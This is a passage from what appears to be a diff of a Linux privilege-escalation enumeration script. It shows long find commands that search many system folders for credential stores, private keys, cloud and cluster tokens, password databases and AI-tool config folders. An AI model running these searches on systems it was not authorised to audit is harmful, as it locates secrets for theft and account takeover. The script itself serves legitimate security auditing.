-name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find ${ROOT_FOLDER}snap -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find ${ROOT_FOLDER}srv -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"gh\" -o -name \"Google Cloud Directory Sync\" -o -name \"logstash\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"Google Cloud Directory Sync\" -o -name \"gh\" -o -name \"session.d\" -o -name \"logstash\" -o -name \"bind\" -o -name \"couchdb\" -o -name \"sentry\" -o -name \"services\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"system-services\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -type d -name \"roundcube\" -o -name \".irssi\" -o -name \"varnish\" -o -name \"zabbix\" -o -name \"*jenkins\" -o -name \"kubelet\" -o -name \"Google Cloud Directory Sync\" -o -name \"gh\" -o -name \"logstash\" -o -name \"bind\" -o -name \"couchdb\" -o -name \"kube-proxy\" -o -name \"sentry\" -o -name \"concourse-keys\" -o -name \"Google Password Sync\" -o -name \"mysql\" -o -name \"ldap\" -o -name \"legacy_credentials\" -o -name \".codex\" -o -name \"filezilla\" -o -name \".cursor\" -o -name \"seeddms*\" -o -name \".cloudflared\" -o -name \"kubernetes\" -o -name \"neo4j\" -o -name \".claude\" -o -name \"ipa\" -o -name \"postfix\" -o -name \"apt.conf.d\" -o -name \"keyrings\" -o -name \".kube*\" -o -name \".vnc\" -o -name \".password-store\" -o -name \"dirsrv\" -o -name \"doctl\" -o -name \".bluemix\" -o -name \"sites-enabled\" -o -name \".docker\" -o -name \"environments\" -o -name \"concourse-auth\" -o -name \"nginx\" -o -name \"gcloud\" -o -name \".svn\" -o -name \"ErrorRecords\" -o -name \"cacti\" -o -name \".gemini\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -type d -name \"concourse-auth\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_DIR_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -type d -name \"concourse-keys\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find ${ROOT_FOLDER}applications -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find ${ROOT_FOLDER}bin -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name \"gitlab.rm\" -o -name \"printers.xml\" -o -name \"unattended.xml\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.ovpn\" -o -name \"filezilla.xml\" -o -name \"backups\" -o -name \"autounattend.xml\" -o -name \"service_principal_entries.bin\" -o -name \"docker.sock\" -o -name \".rhosts\" -o -name \"*credential*\" -o -name \"dockershim.sock\" -o -name \"snmpd.conf\" -o -name \"sssd.conf\" -o -name \"legacy_credentials.db\" -o -name \"*.tfstate\" -o -name \"*.kdbx\" -o -name \"*.pem\" -o -name \"sentry.conf.py\" -o -name \".lesshst\" -o -name \"passwd\" -o -name \"pgsql.conf\" -o -name \"passwd.ibd\" -o -name \"web*.config\" -o -name \"glusterfs.ca\" -o -name \"hostapd.conf\" -o -name \"*.key\" -o -name \"kadm5.acl\" -o -name \".Xauthority\" -o -name \"msal_http_cache.bin\" -o -name \"ddclient.conf\" -o -name \"racoon.conf\" -o -name \"*.service\" -o -name \"Ntds.dit\" -o -name \"sip.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"pg_hba.conf\" -o -name \"msal_token_cache.bin\" -o -name \".profile\" -o -name \"datasources.xml\" -o -name \"plum.sqlite\" -o -name \"AzureRMContext.json\" -o -name \"*.rdg\" -o -name \"accessTokens.json\" -o -name \"msal_token_cache.json\" -o -name \"ConsoleHost_history.txt\" -o -name \"NetSetup.log\" -o -name \"containerd.sock\" -o -name \"jetty-realm.properties\" -o -name \"*.tf\" -o -name \"access.log\" -o -name \"glusterfs.key\" -o -name \"fastcgi_params\" -o -name \"crontab.db\" -o -name \"SAM\" -o -name \"*vnc*.txt\" -o -name \"security.sav\" -o -name \"rsyncd.secrets\" -o -name \".pypirc\" -o -name \"*.vmdk\" -o -name \"*.der\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.pgp\" -o -name \"ffftp.ini\" -o -name \"httpd.conf\" -o -name \"config.xml\" -o -name \"access_tokens.json\" -o -name \"*.jks\" -o -name \"recentservers.xml\" -o -name \"rsyncd.conf\" -o -name \".github\" -o -name \"cloud.cfg\" -o -name \"*vnc*.ini\" -o -name \"known_hosts\" -o -name \"fat.config\" -o -name \".google_authenticator\" -o -name \"wp-config.php\" -o -name \".flyrc\" -o -name \"KeePass.enforced*\" -o -name \"webserver_config.py\" -o -name \"ftp.config\" -o -name \".erlang.cookie\" -o -name \"https-xampp.conf\" -o -name \"bitcoin.conf\" -o -name \"grafana.ini\" -o -name \"gvm-tools.conf\" -o -name \"service_principal_entries.json\" -o -name \"*.keyring\" -o -name \"autologin.conf\" -o -name \".plan\" -o -name \".msmtprc\" -o -name \"setupinfo\" -o -name \"master.key\" -o -name \"*.keytab\" -o -name \"*.keystore\" -o -name \"krb5.conf\" -o -name \"scheduledtasks.xml\" -o -name \"docker-compose.yml\" -o -name \"pwd.ibd\" -o -name \"log4j-core*.jar\" -o -name \"authorized_keys\" -o -name \"*.pub\" -o -name \"Elastix.conf\" -o -name \"passbolt.php\" -o -name \"rktlet.sock\" -o -name \"zabbix_server.conf\" -o -name \".credentials.json\" -o -name \"sitemanager.xml\" -o -name \"vsftpd.conf\" -o -name \"frakti.sock\" -o -name \"protecteduserkey.bin\" -o -name \"index.dat\" -o -name \"ipsec.secrets\" -o -name \"*.sqlite3\" -o -name \"*.swp\" -o -name \"mariadb.cnf\" -o -name \"id_dsa*\" -o -name \"adc.json\" -o -name \"api_key\" -o -name \"clouds.config\" -o -name \"*.csr\" -o -name \".boto\" -o -name \"atlantis.db\" -o -name \"default.sav\" -o -name \"mosquitto.conf\" -o -name \"config.php\" -o -name \"*_history*\" -o -name \"*vnc*.c*nf*\" -o -name \"*.gnupg\" -o -name \"kcpassword\" -o -name \"system.sav\" -o -name \"ipsec.conf\" -o -name \"rocketchat.service\" -o -name \".ldaprc\" -o -name \"gitlab.yml\" -o -name \"*password*\" -o -name \"authorized_hosts\" -o -name \"anaconda-ks.cfg\" -o -name \"pgadmin4.db\" -o -name \"*.psk\" -o -name \"sysprep.xml\" -o -name \"pgadmin*.db\" -o -name \"FreePBX.conf\" -o -name \"SecEvent.Evt\" -o -name \".roadtools_auth\" -o -name \".sudo_as_admin_successful\" -o -name \"*.pfx\" -o -name \".env*\" -o -name \"drives.xml\" -o -name \"creds*\" -o -name \"access_tokens.db\" -o -name \"docker.socket\" -o -name \"tomcat-users.xml\" -o -name \"storage.php\" -o -name \"mysqld.cnf\" -o -name \"kibana.y*ml\" -o -name \"*.socket\" -o -name \"software\" -o -name \"settings.php\" -o -name \"*config*.php\" -o -name \"ftp.ini\" -o -name \"hudson.util.Secret\" -o -name \"FreeSSHDservice.ini\" -o -name \"credentials.tfrc.json\" -o -name \"server.xml\" -o -name \"SYSTEM\" -o -name \"unattend.xml\" -o -name \"azureProfile.json\" -o -name \"appcmd.exe\" -o -name \"snyk.json\" -o -name \"supervisord.conf\" -o -name \"database.php\" -o -name \"ntuser.dat\" -o -name \"*.timer\" -o -name \"bash.exe\" -o -name \"crontab-ui.service\" -o -name \"KeePass.config*\" -o -name \"RDCMan.settings\" -o -name \".secrets.mkey\" -o -name \"smb.conf\" -o -name \".wgetrc\" -o -name \"*.p12\" -o -name \".bashrc\" -o -name \"*.crt\" -o -name \"https.conf\" -o -name \".git\" -o -name \".git-credentials\" -o -name \"krb5cc_*\" -o -name \"backup\" -o -name \"my.ini\" -o -name \"*vnc*.xml\" -o -name \"id_rsa*\" -o -name \"*.cer\" -o -name \"glusterfs.pem\" -o -name \"pagefile.sys\" -o -name \".gitconfig\" -o -name \"secrets.ldb\" -o -name \"elasticsearch.y*ml\" -o -name \"airflow.cfg\" -o -name \"*.viminfo\" -o -name \"my.cnf\" -o -name \"unattend.inf\" -o -name \"groups.xml\" -o -name \"AppEvent.Evt\" -o -name \"*.db\" -o -name \"TokenCache.dat\" -o -name \"software.sav\" -o -name \"cesi.conf\" -o -name \".recently-used.xbel\" -o -name \"nginx.conf\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"*.gpg\" -o -name \"*.ftpconfig\" -o -name \"error.log\" -o -name \".htpasswd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -name \"rpcd\" -o -name \"hosts.equiv\" -o -name \"influxdb.conf\" -o -name \"db.php\" -o -name \"ws_ftp.ini\" -o -name \"winscp.ini\" -o -name \"amportal.conf\" -o -name \"iis6.log\" -o -name \"wsl.exe\" -o -name \"crio.sock\" -o -name \"*.sqlite\" -o -name \"autologin\" -o -name \"firebase-tools.json\" -o -name \"postgresql.conf\" -o -name \"redis.conf\" -o -name \"secrets.yml\" -o -name \"scclient.exe\" -o -name \"mongod*.conf\" -o -name \"sites.ini\" -o -name \"sysprep.inf\" -o -name \"unattend.txt\" -o -name \"000-default.conf\" -o -name \"wcx_ftp.ini\" -o -name \"setupinfo.bak\" -o -name \".vault-token\" -o -name \"*.vhdx\" -o -name \"credentials.xml\" -o -name \"credentials.db\" -o -name \"psk.txt\" -o -name \"password*.ibd\" -o -name \"php.ini\" -o -name \"*.vhd\" -o -name \"snyk.config.json\" -o -name \"KeePass.ini\" -o -name \"debian.cnf\" -o -name 